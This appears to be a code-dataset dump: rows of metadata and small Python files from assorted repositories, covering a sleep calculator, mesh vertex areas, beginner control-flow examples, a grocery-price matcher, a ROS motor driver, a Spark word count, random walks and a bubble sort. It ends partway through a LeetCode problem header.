blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
283
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
41
| license_type
stringclasses 2
values | repo_name
stringlengths 7
96
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 58
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 12.7k
662M
⌀ | star_events_count
int64 0
35.5k
| fork_events_count
int64 0
20.6k
| gha_license_id
stringclasses 11
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 43
values | src_encoding
stringclasses 9
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 7
5.88M
| extension
stringclasses 30
values | content
stringlengths 7
5.88M
| authors
sequencelengths 1
1
| author
stringlengths 0
73
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3e307d287b62bc1365c9f84b092ce3f6e3f832fb | f370072d7d07681654d4a8c06b23e6508af5679c | /untitled1.py | ce7a8aabe886fbfd4e2e10628e197dab9749f4b8 | [] | no_license | Thitsugaya1/python | 58268f3544907db3e03a06d57119437ba942bc2e | 6de59c4c576d73e8552e3bd6a74ab49fda140097 | refs/heads/master | 2021-07-15T17:46:54.608543 | 2020-07-31T17:09:43 | 2020-07-31T17:09:43 | 194,190,801 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 01 19:47:47 2014
@author: Toshiron
"""
Cantidad_horas = float(raw_input("cantidad de horas: "))
Cantidad_anios = float(raw_input("Edad: "))
Total_Horas = Cantidad_anios*8760
Hd = 24/Cantidad_horas
Ho_dormidas = Total_Horas/Hd
Di_dormidos = Ho_dormidas/24
Year_d = Di_dormidos/365
print Year_d, "anios que ah dormido en su vida"
| [
"[email protected]"
] | |
8b89c3071d264d6ae693fe10fbb5a8f56502f10a | e51c97a79a09c3a73fb0ab7f16a9ba670538af84 | /src/vertexarea.py | 59729b0953f18ffed7ca0ec8a08aeb8291bad172 | [] | no_license | zehdeh/spheremeasurements | 90a8f49819343c2da0726f2b6f3e3a8f6d4113f3 | 6e2c6825d63553ac0c53641939aa87bbb7c432ad | refs/heads/master | 2020-05-21T14:59:10.918506 | 2017-01-13T17:08:31 | 2017-01-13T17:08:31 | 64,773,580 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 832 | py | import numpy as np
import math
from timeit import default_timer as timer
def getFaceAngles(face, vertices):
    """Return the interior angles (A, B, C) of a triangle, in radians.

    `face` holds three vertex indices into `vertices`; side a joins
    v0-v1, side b joins v1-v2, side c joins v2-v0.  B is the angle at
    v0, C the angle at v1, and A (= pi - B - C) the angle at v2.
    """
    v = vertices[face]
    a = np.linalg.norm(v[0] - v[1])
    b = np.linalg.norm(v[1] - v[2])
    c = np.linalg.norm(v[2] - v[0])
    # Law of cosines for both B and C.  The previous asin()-based C was
    # ambiguous: for an obtuse C it returned the supplement (pi - C),
    # because asin only covers [-pi/2, pi/2].  acos is unambiguous on [0, pi].
    B = math.acos((a**2 + c**2 - b**2) / (2*a*c))
    C = math.acos((a**2 + b**2 - c**2) / (2*a*b))
    A = np.pi - B - C
    return A,B,C
def getFaceArea(face, vertices):
    """Area of the triangle whose vertex indices are given by `face` (Heron's formula)."""
    corners = vertices[face]
    side_a = np.linalg.norm(corners[0] - corners[1])
    side_b = np.linalg.norm(corners[1] - corners[2])
    side_c = np.linalg.norm(corners[2] - corners[0])
    half_perimeter = (side_a + side_b + side_c) / 2
    # np.sqrt (not math.sqrt) keeps the original behaviour of returning nan
    # instead of raising if rounding pushes the product slightly negative.
    return np.sqrt(half_perimeter
                   * (half_perimeter - side_a)
                   * (half_perimeter - side_b)
                   * (half_perimeter - side_c))
def getVertexAreas(faces, vertices):
    """Per-vertex area: one third of each incident face's area, summed.

    `faces` is an (F, 3) index array; a face counts once per vertex even
    if listed degenerately.
    """
    third_of_face = np.array([getFaceArea(f, vertices) for f in faces]) / 3
    areas = np.empty(len(vertices))
    for vertex_index in range(len(vertices)):
        # Boolean mask of faces that reference this vertex.
        incident = np.any(faces == vertex_index, axis=1)
        areas[vertex_index] = np.sum(third_of_face[incident])
    return areas
| [
"[email protected]"
] | |
b277bc417e82dc0347d75608d8b8bad5d11f6ae8 | ba69a96366b7b6801feac5e8716443331838662b | /easy/RemoveElement.py | 14b77e25687554aea201b298b86477e2ef57c3b3 | [] | no_license | gx20161012/leetcode | 8e3e99aecb824668e54652d608bca2137d5d47fe | 2765e846c804caf17472fe548e4246b6eff63966 | refs/heads/master | 2021-07-29T20:01:21.059713 | 2021-07-28T15:45:05 | 2021-07-28T15:45:05 | 147,936,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | class Solution:
def removeElement(self, nums, val):
"""
:type nums: List[int]
:type val: int
:rtype: int
"""
count = nums.count(val)
for i in range(count):
nums.remove(val)
return len(nums)
# Quick demo: strip every 2 from the sample list, then print the
# returned length followed by the mutated list.
solver = Solution()
sample = [0, 1, 2, 2, 3, 0, 4, 2]
target = 2
print(solver.removeElement(sample, target))
print(sample)
"[email protected]"
] | |
4cc08112be4d4b74e844373295dfe2d29f3ee2a7 | 8804e0fa548726a8683ddececa90c3d789b58a13 | /quick_tut/basic_control.py | 48facec6d17dd71eda5eb7cc44469b869d6e9b23 | [] | no_license | thienkyo/pycoding | aeea0693c99598cd7204e0afa2d4bad7f2805078 | c915dc6adc4b2d2ff17e59e9da35cf5a220508dc | refs/heads/master | 2021-01-12T08:20:05.063961 | 2016-12-14T05:47:02 | 2016-12-14T05:47:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 820 | py | # If
# Branching: walk the grade bands, first match wins; the for-else runs
# only when no band matched.
grade = 9
for threshold, message in ((9, 'Awesome'), (7, 'Good'), (5, 'Not bad')):
    if grade >= threshold:
        print(message)
        break
else:
    print('No way')
# Boolean operators: or, and, not.
if (10 > 5) or (10 < 2):
    print('true')
if (10 > 5) and (10 > 2):
    print('true')
if not (10 < 2):
    print('true')
# Iterating a literal sequence, then a range (stop value is excluded).
for num in (1, 2, 3):
    print(num)
for num in range(1, 3):
    print(num)
cats = ['Tom', 'Jerry', 'Cat']
for idx, val in enumerate(cats):  # enumerate pairs each item with its index
    print(idx, val)
# while repeats its body until the condition turns false.
i = 0
while i < 10:
    print('Iteration:', i)
    i += 1
# break leaves the loop entirely; continue skips to the next iteration.
for item in [1, 2, 3, 4]:
    if item == 3:
        break  # stop the whole loop when we see 3
    print(item)
for item in [1, 2, 3, 4]:
    if item == 3:
        continue  # skip only the 3
    print(item)
# pass is a placeholder statement that does nothing.
for i in range(1, 10):
    pass
| [
"[email protected]"
] | |
884621be26ade33f8eb4183988131399d396086b | e28ad0328a7c44573b90b613650dcdf80a99991a | /Examples/for.py | ccd20002a614e78500f5b8ed0418ebe95d7e70e4 | [] | no_license | ryankennedy712/Python | 34f3fbcff5e6b474877f08936ac746828ed03ff1 | 9282008ef949e7215d5e9bb0c948164b306a7b3b | refs/heads/master | 2020-06-11T00:14:33.494819 | 2020-03-02T00:46:59 | 2020-03-02T00:46:59 | 193,801,252 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | #for loop
# A `for` loop visits each value an iterable produces, one at a time.
# range(start, stop) counts from `start` up to, but not including, `stop`,
# so range(1, 10) yields the integers 1 through 9.
for x in range(1, 10):
    print(x)
| [
"[email protected]"
] | |
d1fc228680184699671cc79a504fe1cc836c0403 | b6efe59f3117da81a76ac634f010fd1feaeef25c | /api/make_file.py | 09e277a20223f11016c8ffc78ee3d6c3dbda55f8 | [] | no_license | kaktusss123/goods_parsing | b53e342710a1dd8d69b92d2a5f2ca9ef39e05385 | b0700e067103c2410e40331fab6ab7d449271a2b | refs/heads/master | 2021-01-08T02:38:36.686227 | 2020-02-20T13:13:44 | 2020-02-20T13:13:44 | 241,887,323 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,794 | py | import pandas as pd
from functools import reduce
from preprocess import preprocess, Status
from json import load
def match(args):
operations = [
lambda x, y: x['match_2'] == y['match_2'],
lambda x, y: x['match_3'] == y['match_3'],
lambda x, y: ''.join(x['brand'].lower().split()) ==
''.join(y['brand'].lower().split()),
lambda x, y: x['egg_cat'] == y['egg_cat'],
lambda x, y: x['yogurt'] == y['yogurt'],
lambda x, y: x['milk'] == y['milk'],
lambda x, y: x['butter'] == y['butter']
]
cols = [(f'{args[1][0]}_{i}', f'price_{i}') for i in range(10)]
cols = [f'{args[0][0]}', f'{args[0][0]}_price'] + \
[item for sublist in cols for item in sublist]
res = pd.DataFrame(columns=cols)
items = {}
for arg in args:
with open(f'items/{arg[1]}', encoding='utf-8') as f:
items[arg[0]] = list(
map(preprocess, map(lambda x: x.get('data') or x['value']['data'], load(f))))
items[arg[0]] = list(map(lambda x: x[0], filter(
lambda x: x[1] == Status.OK, items[arg[0]])))
if 'price_sub' in items[arg[0]][0]:
for rec in items[arg[0]]:
rec['price_main'] += rec['price_sub'] / 100
banned_g, banned_u = set(), set()
for g in items[args[0][0]]:
matched = []
if not g['brand']:
continue
for u in items[args[1][0]]:
if not u['brand']:
continue
if all([func(g, u) for func in operations]):
banned_u.add(u['product_name'])
matched.extend([u['product_name'], u['price_main']])
if matched:
banned_g.add(g['product_name'])
matched = [g['product_name'], g['price_main']] + matched
res = res.append(dict(zip(cols, matched)), ignore_index=True)
unbanned_g = pd.DataFrame(columns=['Наименование', 'Цена'])
unbanned_u = pd.DataFrame(columns=['Наименование', 'Цена'])
for g in items[args[0][0]]:
if g['product_name'] not in banned_g:
unbanned_g = unbanned_g.append(
{'Наименование': g['product_name'], 'Цена': g['price_main']}, ignore_index=True)
for g in items[args[1][0]]:
if g['product_name'] not in banned_u:
unbanned_u = unbanned_u.append(
{'Наименование': g['product_name'], 'Цена': g['price_main']}, ignore_index=True)
### Statistics ###
stat = pd.DataFrame(
columns=['source', 'full', 'matched', 'match_pct'])
stat = stat.append({'source': args[0][0], 'full': len(items[args[0][0]]), 'matched': len(
res), 'match_pct': f'{len(res) / len(items[args[0][0]]) * 100:.2f}%'}, ignore_index=True)
stat = stat.append({'source': args[1][0], 'full': len(items[args[1][0]]), 'matched': len(
res), 'match_pct': f'{len(res) / len(items[args[1][0]]) * 100:.2f}%'}, ignore_index=True)
return res, unbanned_g, unbanned_u, stat
ut, gl, pe = ('utkonos', 'utkonos.json'), ('globus',
'globus.json'), ('perekrestok', 'PEREKR_item_2.json')
# ut, gl, pe = ('globus', 'globus.json'), ('globus_tver',
# 'globus_tver.json'), ('globus_ryazan', 'globus_ryazan.json')
for e in ((ut, pe), (gl, pe), (gl, ut)):
m, g, u, stat = match(e)
with pd.ExcelWriter(f'result_{e[0][0]}_{e[1][0]}.xlsx') as writer:
m.to_excel(writer, index=False, sheet_name='Совпадение')
g.to_excel(writer, index=False, sheet_name=e[0][0])
u.to_excel(writer, index=False, sheet_name=e[1][0])
stat.to_excel(writer, index=False, sheet_name='Статистика')
| [
"PaRoLoK123"
] | PaRoLoK123 |
427f98bf697d88d38a96995808a89004588dba24 | a84164d6298da8788f32451bb1a876670741c533 | /mountains/apps.py | 22e1c20e670b9e48fcab310be9f49044c049a186 | [
"MIT"
] | permissive | marcelotokarnia/mountain-catalog | 0e717a5cf78c422afa60c906816067344787824e | 8d5b9591e6b24ab7305016e1df41b0dc6e933388 | refs/heads/master | 2023-03-04T20:10:07.944709 | 2022-04-11T21:24:43 | 2022-04-11T21:24:43 | 134,347,237 | 1 | 0 | MIT | 2023-03-01T23:18:07 | 2018-05-22T02:05:21 | Python | UTF-8 | Python | false | false | 93 | py | from django.apps import AppConfig
class MountainsConfig(AppConfig):
    """Application configuration for the `mountains` Django app."""
    # Dotted module path of the application; Django derives the app label from it.
    name = 'mountains'
| [
"[email protected]"
] | |
52eeb1962ffc2f1522775ef4204b087658e06a7a | 3039e5a569ffb26ad9b3efc9b3f8f142a79ebac9 | /RaspberryPi/catkin_ws/src/rpimotor/src/drive.py.orig | 7a27d32e015652d966bc07e52c312100f8bb2f03 | [] | no_license | lbaitemple/newcar | 91eb958cb50d9490b73e0d49326b47d0453e29c3 | ed834f2fb954bf1d0fc35a1bcb613ce634040486 | refs/heads/master | 2020-03-27T00:12:01.043533 | 2019-04-17T18:59:09 | 2019-04-17T18:59:09 | 145,603,131 | 2 | 1 | null | 2019-03-30T20:15:23 | 2018-08-21T18:23:59 | C++ | UTF-8 | Python | false | false | 2,649 | orig | #!/usr/bin/env python
import sys, tty, termios, time, rospy
import RPi.GPIO as GPIO
from std_msgs.msg import String
from std_msgs.msg import Bool
from std_msgs.msg import Empty
from std_msgs.msg import Int32
from race.msg import drive_param
# Pre-built message object (not referenced by the callbacks below).
str_msg = Int32()
# Emergency-stop latch: read by messageDrive, written by messageEmergencyStop.
flagStop = False
# PWM band defaults are now assigned in __main__ (where the ~shift parameter
# is applied); these remain for reference only.
#pwm_center = 15
#pwm_lowerlimit = 10
#pwm_upperlimit = 20
#prev_v=14
def getch():
    """Read one raw (unbuffered, unechoed) character from stdin.

    Switches the terminal to raw mode for the read and always restores
    the previous settings, even if the read raises.
    """
    fd = sys.stdin.fileno()
    saved_settings = termios.tcgetattr(fd)
    try:
        tty.setraw(fd)
        char = sys.stdin.read(1)
    finally:
        termios.tcsetattr(fd, termios.TCSADRAIN, saved_settings)
    return char
def messageDrive(pwm):
    """Map a drive_param message onto the motor (m) and steering (s) PWM pins.

    Duty cycle = value * 5 + pwm_center, clamped to
    [pwm_lowerlimit, pwm_upperlimit].  While flagStop is set, both
    channels are forced to the neutral centre instead.
    """
    global prev_v
    if(flagStop == False):
        rospy.loginfo("speed: %f, prev speed %d", pwm.velocity, prev_v)
        # Scale the commanded velocity into a duty-cycle value around centre.
        v = (int) (pwm.velocity * 5 + pwm_center)
        # When the command crosses the centre (direction reversal), emit one
        # neutral cycle first -- presumably to avoid an instant
        # forward/reverse flip on the motor controller (TODO: confirm intent).
        if (v>pwm_center and prev_v<pwm_center):
            m.ChangeDutyCycle(pwm_center)
        elif(v<pwm_center and prev_v>pwm_center):
            m.ChangeDutyCycle(pwm_center)
        prev_v=v
        # Clamp the motor duty cycle to the allowed band.
        if(v < pwm_lowerlimit):
            m.ChangeDutyCycle(pwm_lowerlimit)
        elif(v > pwm_upperlimit):
            m.ChangeDutyCycle(pwm_upperlimit)
        else:
            m.ChangeDutyCycle(v)
        # Steering: same scaling and clamping, but no reversal smoothing.
        a = pwm.angle * 5 + pwm_center
        if(a < pwm_lowerlimit):
            s.ChangeDutyCycle(pwm_lowerlimit)
        elif(a > pwm_upperlimit):
            s.ChangeDutyCycle(pwm_upperlimit)
        else:
            s.ChangeDutyCycle(a)
    else:
        # Emergency stop active: hold both channels at neutral.
        m.ChangeDutyCycle(pwm_center)
        s.ChangeDutyCycle(pwm_center)
def messageEmergencyStop(flag):
    """Latch the e-stop flag; when set, centre both PWM channels (neutral)."""
    global flagStop  # was a function-local assignment, so the module-level flag never changed
    flagStop = flag.data
    if flagStop:  # was `flagStop == true`: `true` is undefined -> NameError when the e-stop fired
        m.ChangeDutyCycle(pwm_center)
        s.ChangeDutyCycle(pwm_center)
def listener():
    """Initialise the ROS node and block until shutdown.

    Routes 'drive_parameters' messages to messageDrive and 'eStop'
    messages to messageEmergencyStop, then spins.
    """
    rospy.init_node('listener', anonymous=True)
    rospy.Subscriber("drive_parameters", drive_param, messageDrive)
    rospy.Subscriber("eStop", Bool, messageEmergencyStop)
    rospy.spin()
if __name__ == '__main__':
    # NOTE(review): `global` at module level is a no-op; the assignments
    # below already create/update module-level names.
    global pwm_center
    global pwm_lowerlimit
    global pwm_upperlimit
    global prev_v
    # Duty-cycle band (percent) before the configurable shift is applied.
    pwm_center = 15
    pwm_lowerlimit = 10
    pwm_upperlimit = 20
    prev_v=14
    GPIO.setmode(GPIO.BOARD)
    # Pin numbers (BOARD numbering), PWM frequency and band shift from the
    # ROS parameter server, with defaults.
    sport=rospy.get_param('~steer_port', 33)
    mport=rospy.get_param('~motor_port', 12)
    freq=rospy.get_param('~frequency', 100)
    shift=rospy.get_param('~shift', 0)
    GPIO.setup(sport, GPIO.OUT)
    GPIO.setup(mport, GPIO.OUT)
    s = GPIO.PWM(sport, freq) # channel=12 frequency=100Hz
    m = GPIO.PWM(mport, freq)
    # Shift the whole band; `center` ends up equal to the shifted pwm_center.
    center=pwm_center+shift
    pwm_lowerlimit=pwm_lowerlimit+shift
    pwm_center = pwm_center+shift
    pwm_upperlimit = pwm_upperlimit +shift
    # Start both channels at neutral, then block in listener() until the
    # node shuts down.
    s.start(center)
    m.start(center)
    print "ROS stuff initializing"
    listener()
    # Node shut down: park the steering output and release the GPIO pins.
    s.ChangeDutyCycle(center)
    s.stop()
    m.stop()
    GPIO.cleanup()
| [
"[email protected]"
] | |
c74a1642bf69ff8e2f66383bd39c36cd3f74607a | c21be7fd13f55ccf884271f69314d508596047c8 | /locallibrary/locallibrary/catalog/migrations/0002_auto_20180706_1228.py | 7567ff4c0547775c6d64cfb3f0ee1115d5257abe | [] | no_license | khanguslee/django-spike | 1305fb36593651a9127f7dfaefa893217706af00 | 8656b7e9f860e2a532c8513c9161a0a768866daf | refs/heads/master | 2020-03-18T21:47:46.905558 | 2018-07-18T16:23:06 | 2018-07-18T16:23:06 | 135,303,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 366 | py | # Generated by Django 2.0.7 on 2018-07-06 02:28
from django.db import migrations
class Migration(migrations.Migration):
    """Rename catalog.Author.data_of_birth to date_of_birth (typo fix).

    Schema-only rename; no row data is modified.
    """
    dependencies = [
        # Must run after the initial catalog schema migration.
        ('catalog', '0001_initial'),
    ]
    operations = [
        migrations.RenameField(
            model_name='author',
            old_name='data_of_birth',
            new_name='date_of_birth',
        ),
    ]
| [
"[email protected]"
] | |
c865b1ad43647c13c16878af99bfb0a29466ab5f | 266e641b716f7f13c592234f63fa5a57c1370cff | /Termo Simulations with GUI/pywalker/polar_grid_walk.py | cf164c3ef75db95e1a58e39301d6cd8bd5fa0f5d | [] | no_license | kadirberatyildirim/Some-Small-Projects | 68468d21e6f3a259925281b5494ea403b9d66091 | 9946597990c63f15f0af2d89d6eda94525c486fa | refs/heads/master | 2023-08-30T08:20:37.476328 | 2021-11-18T12:58:50 | 2021-11-18T12:58:50 | 250,818,052 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,609 | py | """
Random-walk simulators on 2D and 3D integer grids, with helpers to export
the path and per-value occurrence counts to pandas and to plot them with
matplotlib.
"""
import numpy as np
class random_walk_2d():
    """Random walk on a 2D (r, theta) integer grid.

    Each step moves exactly one coordinate by +/- step_size.  The walk runs
    immediately on construction; afterwards `path` is a (steps+1, 2) array
    and `occurences` lists, for every integer value between the path minimum
    and maximum, how often it appears in each coordinate column.
    """
    def __init__(self, steps, init_pos = (0, 0), step_size = 1):
        self.steps = steps
        self.path = [init_pos]
        self.step_size = step_size
        self.allowed_steps = ['+r', '-r', '+theta', '-theta']
        self.occurences = []
        self.walk()
    def walk(self):
        """Generate the full path, then precompute the occurrence table."""
        for i in range(self.steps):
            self.path.append(self.calc_next())
        self.path = np.array(self.path)
        self.occurences = self.calc_occurences()
    def calc_next(self):
        """Pick a uniformly random direction and return the next position."""
        cur_step = np.random.choice(self.allowed_steps)
        if cur_step == '+r': next_pos = (self.path[-1][0] + self.step_size, self.path[-1][1])
        elif cur_step == '-r': next_pos = (self.path[-1][0] - self.step_size, self.path[-1][1])
        elif cur_step == '+theta': next_pos = (self.path[-1][0], self.path[-1][1] + self.step_size)
        elif cur_step == '-theta': next_pos = (self.path[-1][0], self.path[-1][1] - self.step_size)
        return next_pos
    def path_to_pandas(self):
        """Return the path as a DataFrame with columns x (r) and y (theta)."""
        import pandas as pd
        return pd.DataFrame(self.path, columns = ['x', 'y'])
    def plot_path(self):
        """Draw the walk on a polar plot (column 0 = radius, column 1 = angle)."""
        import matplotlib.pyplot as plt
        plt.polar(self.path[:, 1], self.path[:, 0], xunits = 'degrees')
        plt.title('2D Random Walk with {} Steps'.format(self.steps))
        plt.show()
    def calc_occurences(self):
        """Count, per coordinate column, how often each integer value occurs.

        Assumes integer positions (integral init_pos and step_size).
        """
        # Bug fix: the upper bound is now inclusive -- range(min, max) used
        # to skip the maximum coordinate value, so it was never counted.
        unique = range(np.min(self.path), np.max(self.path) + 1)
        counts = np.array([np.count_nonzero(self.path == i, axis = 0)
                           for i in unique])
        return np.concatenate((np.array([unique]).T, counts), axis = 1)
    def occurences_to_pandas(self):
        """Return the occurrence table as a DataFrame (one count column per axis)."""
        import pandas as pd
        return pd.DataFrame(self.occurences, columns = ['values', 'x_count', 'y_count'])
    def plot_occurences(self):
        """Line plot of per-value occurrence counts for both coordinates."""
        import matplotlib.pyplot as plt
        plt.plot(self.occurences[:, 0], self.occurences[:, 1], label = 'x count')
        plt.plot(self.occurences[:, 0], self.occurences[:, 2], label = 'y count')
        plt.legend()
        plt.title('Occurences')
        plt.xlabel('Unique values')
        plt.ylabel('Counts')
        plt.show()
    def barplot_occurences(self):
        """Bar plot of per-value occurrence counts for both coordinates."""
        import matplotlib.pyplot as plt
        plt.bar(self.occurences[:, 0], self.occurences[:, 1], label = 'x count')
        plt.bar(self.occurences[:, 0], self.occurences[:, 2], label = 'y count')
        plt.legend()
        plt.title('Occurences')
        plt.xlabel('Unique values')
        plt.ylabel('Counts')
        plt.show()
class random_walk_3d():
    """Unit-step random walk on the 3D integer lattice.

    Each step moves exactly one coordinate by +/- 1.  The walk runs on
    construction; afterwards `path` is a (steps+1, 3) array and
    `occurences` lists, for every integer value between the path minimum
    and maximum, how often it appears in each coordinate column.
    """
    def __init__(self, steps, init_pos = (0, 0, 0)):
        self.steps = steps
        self.path = [init_pos]
        self.allowed_steps = ['+x', '-x', '+y', '-y', '+z', '-z']
        self.occurences = []
        self.walk()
    def walk(self):
        """Generate the full path, then precompute the occurrence table."""
        for i in range(self.steps):
            self.path.append(self.calc_next())
        self.path = np.array(self.path)
        self.occurences = self.calc_occurences()
    def calc_next(self):
        """Pick a uniformly random direction and return the next position."""
        cur_step = np.random.choice(self.allowed_steps)
        if cur_step == '+x':
            next_pos = (self.path[-1][0] + 1, self.path[-1][1], self.path[-1][2])
        elif cur_step == '-x':
            next_pos = (self.path[-1][0] - 1, self.path[-1][1], self.path[-1][2])
        elif cur_step == '+y':
            next_pos = (self.path[-1][0], self.path[-1][1] + 1, self.path[-1][2])
        elif cur_step == '-y':
            next_pos = (self.path[-1][0], self.path[-1][1] - 1, self.path[-1][2])
        elif cur_step == '+z':
            next_pos = (self.path[-1][0], self.path[-1][1], self.path[-1][2] + 1)
        elif cur_step == '-z':
            next_pos = (self.path[-1][0], self.path[-1][1], self.path[-1][2] - 1)
        return next_pos
    def path_to_pandas(self):
        """Return the path as a DataFrame with columns x, y and z."""
        import pandas as pd
        return pd.DataFrame(self.path, columns = ['x', 'y', 'z'])
    def plot_path(self):
        """Draw the walk as a 3D line plot."""
        import matplotlib.pyplot as plt
        from mpl_toolkits.mplot3d import Axes3D
        fig = plt.figure()
        ax = fig.add_subplot(111, projection='3d')
        ax.plot(self.path[:, 0], self.path[:, 1], self.path[:, 2])
        plt.title('3D Random Walk with {} Steps'.format(self.steps))
        plt.show()
    def calc_occurences(self):
        """Count, per coordinate column, how often each integer value occurs."""
        # Bug fix: the upper bound is now inclusive -- range(min, max) used
        # to skip the maximum coordinate value, so it was never counted.
        unique = range(np.min(self.path), np.max(self.path) + 1)
        counts = np.array([np.count_nonzero(self.path == i, axis = 0)
                           for i in unique])
        return np.concatenate((np.array([unique]).T, counts), axis = 1)
    def occurences_to_pandas(self):
        """Return the occurrence table as a DataFrame (one count column per axis)."""
        import pandas as pd
        # Bug fix: the table has four columns (values + x/y/z counts); the
        # original column list omitted 'z_count', so pandas raised ValueError.
        return pd.DataFrame(self.occurences, columns = ['values', 'x_count', 'y_count', 'z_count'])
    def plot_occurences(self):
        """Line plot of per-value occurrence counts for all three coordinates."""
        import matplotlib.pyplot as plt
        plt.plot(self.occurences[:, 0], self.occurences[:, 1], label = 'x count')
        plt.plot(self.occurences[:, 0], self.occurences[:, 2], label = 'y count')
        plt.plot(self.occurences[:, 0], self.occurences[:, 3], label = 'z count')
        plt.legend()
        plt.title('Occurences')
        plt.xlabel('Unique values')
        plt.ylabel('Counts')
        plt.show()
    def barplot_occurences(self):
        """Bar plot of per-value occurrence counts for all three coordinates."""
        import matplotlib.pyplot as plt
        plt.bar(self.occurences[:, 0], self.occurences[:, 1], label = 'x count')
        plt.bar(self.occurences[:, 0], self.occurences[:, 2], label = 'y count')
        plt.bar(self.occurences[:, 0], self.occurences[:, 3], label = 'z count')
        plt.legend()
        plt.title('Occurences')
        plt.xlabel('Unique values')
        plt.ylabel('Counts')
        plt.show()
plt.show()
| [
"[email protected]"
] | |
fdbbd3c5a74e3bde1633775550ed3c99e90b4f4b | a7063e41600a0faa85881f9a549c3e6ee84c9627 | /AWS_EMR_count_q1-1_reduce_combine.py | c655a30d713224f080b05260ada26dc52c7bfeb8 | [] | no_license | Frankie-Spencer/AWS_EMR_CC2020 | 30a8897cc83f18addb58bc870727bd2f1b662732 | a9a909b1ece32b0092c4308caae7dff85b380a27 | refs/heads/master | 2022-06-25T19:05:45.454977 | 2020-05-12T10:17:22 | 2020-05-12T10:17:22 | 263,301,275 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,429 | py | import sys
from pyspark import SparkContext, HiveContext
sc = SparkContext()
sqlContext = HiveContext(sc)  # NOTE(review): created but never used below
# Positional CLI arguments, e.g.:  /dir/text.txt /dir/out 100 'reduce'
#   source_path: input text file     out_path: output directory
#   amount: how many top words       process_type: 'reduce' or 'combine'
args = sys.argv
source_path, out_path, amount, process_type = args[1], args[2], args[3], args[4]
# Single-pair RDD used with subtractByKey to drop the None key, i.e. all
# tokens that contained no alphabetic character (and empty strings from
# splitting).
remove_items = sc.parallelize([(None, None)])
# import input file, and set use_unicode to True to recognise Finnish letters
input_file = sc.textFile(source_path, use_unicode=True)
# Tokenise on spaces, map each token to (word, 1) -- recoding tokens with
# no alphabetic character to the key None -- drop the None key, then sum
# the per-word counts with reduceByKey.
if process_type == 'reduce':
    word_count = input_file.flatMap(lambda line: line.split(' '))\
        .map(lambda word: [word if any(s.isalpha() for s in word) else None, 1])\
        .subtractByKey(remove_items)\
        .reduceByKey(lambda a, b: a + b)
# Same pipeline, but summing the per-word counts with combineByKey instead.
elif process_type == 'combine':
    word_count = input_file.flatMap(lambda line: line.split(' ')) \
        .map(lambda word: [word if any(s.isalpha() for s in word) else None, 1]) \
        .subtractByKey(remove_items) \
        .combineByKey(lambda v: v,
                      lambda c, v: c + v,
                      lambda c1, c2: c1 + c2)
# make a function to correct invalid inputs to be equal to total entries
# and users can enter 0 if they want full list, as its usually the standard
def output_amount(n):
    """Coerce the CLI `amount` argument to a positive int.

    Non-numeric or non-positive input falls back to the full vocabulary
    size (word_count.count()), so 0 means "return everything".
    """
    try:
        num = int(n)
    except (TypeError, ValueError):
        # was a bare `except:`, which also swallowed SystemExit/KeyboardInterrupt
        return word_count.count()
    if num <= 0:
        return word_count.count()
    return num
# Take the `amount` most frequent words, ordered by descending count.
word_count_limit_sorted = word_count.takeOrdered(output_amount(amount), key=lambda x: -x[1])
# Re-parallelise the collected list and coalesce to one partition so a
# single output file is written.
final_output = sc.parallelize(word_count_limit_sorted)\
    .coalesce(1)
# write to text file
final_output.saveAsTextFile(out_path)
# stop Spark
sc.stop()
| [
"[email protected]"
] | |
f266e0d0170f262603ee62eb65a42971b55eace2 | 8048df61aa0d739dcc4d3d1315e2e2b807ff8b4b | /Sorting methods/bubble sort.py | c8d577d0ffc695db0d664fb83c00d7525e5c050a | [] | no_license | Aniangelsuperbat1/Algorithms | 3e1097292edc6471e898550456ee38c7f2b7f0a2 | 6c2b853c5e1a8d86176659cf38fe2a845dd91186 | refs/heads/master | 2023-01-23T22:14:09.717974 | 2020-12-06T22:18:49 | 2020-12-06T22:18:49 | 314,376,463 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 527 | py | # Takes an un ordered list and sorts them in ascending value
# Bubble sort: repeatedly sweep the list, swapping adjacent out-of-order
# pairs, until one full sweep makes no swap.  Sorts in place (ascending)
# and returns the same list object.  Worst case O(n^2) comparisons.
def bubble_sort(list_a):
    last = len(list_a) - 1
    swapped = True
    while swapped:
        swapped = False
        for j in range(last):
            if list_a[j] > list_a[j + 1]:
                list_a[j], list_a[j + 1] = list_a[j + 1], list_a[j]
                swapped = True
    return list_a
# Demo: sort the sample list in place and print the result.
print(bubble_sort([1,3,565,4543,434,767,67897,87,34]))
"[email protected]"
] | |
740e1452267d94475b889877c0ab43214417c4d9 | 7c870e0f5951becc0242eb664b855e1404246e16 | /LeetCode/76.最小覆盖子串.py | e5e4a44bd156d83322bfaac4a010f1b809883477 | [] | no_license | kobe24167/Study | 73a0dddfee4e9067c6a49d2a218f5d57086a4bd7 | 8d85d746b9e0882bfb40ada208b689178bc8f3d8 | refs/heads/master | 2022-12-24T18:28:19.129921 | 2021-06-29T01:52:21 | 2021-06-29T01:52:21 | 161,650,160 | 2 | 0 | null | 2022-12-16T09:57:04 | 2018-12-13T14:24:40 | JavaScript | UTF-8 | Python | false | false | 1,463 | py | #
# @lc app=leetcode.cn id=76 lang=python3
#
# [76] 最小覆盖子串
#
# https://leetcode-cn.com/problems/minimum-window-substring/description/
#
# algorithms
# Hard (36.06%)
# Likes: 240
# Dislikes: 0
